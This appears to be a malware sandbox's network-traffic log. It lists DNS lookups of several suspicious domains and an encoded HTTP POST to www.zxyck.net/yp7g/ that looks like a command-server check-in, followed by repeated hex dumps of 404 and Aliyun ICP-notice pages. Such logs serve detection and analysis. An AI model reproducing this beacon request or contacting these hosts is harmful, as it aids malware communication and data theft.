Source: global traffic	DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic	DNS traffic detected: DNS query: www.zxyck.net
Source: global traffic	DNS traffic detected: DNS query: www.egldfi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sankan-fukushi.info
Source: global traffic	DNS traffic detected: DNS query: www.buckser.info
Source: global traffic	DNS traffic detected: DNS query: www.innovateideas.xyz

Source: unknown

HTTP traffic detected: POST /yp7g/ HTTP/1.1Host: www.zxyck.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-USOrigin: http://www.zxyck.netContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 216Connection: closeReferer: http://www.zxyck.net/yp7g/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)Data Raw: 64 30 73 3d 7a 33 72 70 4f 48 56 51 6c 74 76 2f 6b 4d 61 73 61 72 49 56 72 6a 35 41 35 67 53 79 39 4c 41 79 63 71 72 72 6c 79 54 6c 46 51 2f 7a 4a 39 6f 56 72 71 61 5a 6c 79 6a 6a 73 35 43 37 50 2f 39 46 33 53 62 37 63 76 33 62 31 47 35 63 68 69 79 4d 4b 49 4d 41 70 6d 35 2f 70 39 6a 57 70 73 35 71 41 51 46 46 42 56 71 70 64 4c 31 53 2b 38 33 71 61 45 55 6b 6e 41 43 6b 69 65 42 68 35 49 39 2b 7a 59 70 31 48 39 45 4b 6a 6d 48 56 70 2b 65 56 33 4a 7a 76 58 49 46 70 51 5a 68 56 32 67 65 30 57 5a 64 63 74 72 52 4e 4b 66 34 76 72 65 72 71 68 4d 6c 63 4e 34 6f 75 48 47 47 31 78 53 48 42 58 48 4d 61 4d 41 74 7a 32 41 6d 47 59 76 71 42 75 77 3d 3d Data Ascii: d0s=z3rpOHVQltv/kMasarIVrj5A5gSy9LAycqrrlyTlFQ/zJ9oVrqaZlyjjs5C7P/9F3Sb7cv3b1G5chiyMKIMApm5/p9jWps5qAQFFBVqpdL1S+83qaEUknACkieBh5I9+zYp1H9EKjmHVp+eV3JzvXIFpQZhV2ge0WZdctrRNKf4vrerqhMlcN4ouHGG1xSHBXHMaMAtz2AmGYvqBuw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:45 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:48 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 07:55:53 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 34 32 35 32 32 30 36 36 38 31 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> 